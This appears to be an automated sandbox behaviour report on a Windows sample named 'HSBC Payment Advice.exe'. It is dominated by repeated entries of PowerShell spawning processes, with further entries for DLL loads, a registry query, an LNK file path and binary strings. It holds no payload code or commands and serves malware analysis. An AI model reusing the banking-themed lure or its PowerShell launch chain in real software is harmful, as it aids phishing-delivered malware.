    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: typhaceae.lnk.0.drLNK file: ..\..\..\seralbumen\Retslgeraad.Gun38
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: CallSite.Targetore.pdb) source: powershell.exe, 00000002.00000002.91926000124.00000000086E1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.91922466152.00000000072D7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tem.Core.pdbo source: powershell.exe, 00000002.00000002.91926485061.00000000087A0000.00000004.00000020.00020000.00000000.sdmp
